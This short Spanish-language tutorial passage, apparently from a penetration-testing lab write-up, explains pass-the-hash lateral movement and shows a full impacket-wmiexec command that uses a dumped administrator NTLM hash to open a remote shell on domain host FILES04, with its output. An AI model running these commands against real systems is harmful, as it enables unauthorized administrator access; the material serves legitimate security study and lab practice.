Podemos hacer pass the hash con muchas herramientas para autenticarnos en otros equipos, entre ellas, evil-winrm, xfreerdp, psexec, wmiexec… Este seria un ejemplo de como autenticarnos con el hash de administrador en otra máquina del dominio, despues de haber dumpeado su hash, como puede ser con mimikatz

kali@kali:~$ /usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E [email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\\>hostname
FILES04

C:\\>whoami
files04\\administrator